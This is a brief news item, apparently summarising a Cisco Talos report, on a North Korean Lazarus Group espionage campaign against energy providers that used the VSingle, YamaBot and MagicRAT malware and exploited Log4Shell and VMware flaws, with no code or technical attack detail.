Lazarus APT cyberespionage campaign sets sights on energy firms worldwide

U.S., Canadian, and Japanese energy providers, as well as energy firms in other countries, have been targeted in a cyberespionage campaign launched by North Korean state-sponsored threat operation Lazarus Group from February to July, The Hacker News reports. Such a campaign was aimed to facilitate long-term access to compromised organizations and enable data exfiltration to North Korea, a report from Cisco Talos revealed. Contrary to similar cyberespionage attacks launched by Lazarus subgroup Stonefly, also known as Andariel, in April and May, which were reported by Symantec and AhnLab to have prompted the deployment of the NukeSped and Preft implants, the newest campaign involved the Lazarus Group leveraging the VSingle bot malware with arbitrary code execution capabilities, the Golang-based backdoor YamaBot, and the novel remote access trojan MagicRAT. The report also showed that Lazarus Group had exploited Log4Shell and other VMware product vulnerabilities to obtain initial network access and that the lone VSingle infection chain enabled reconnaissance, data exfiltration, and manual backdoor attacks.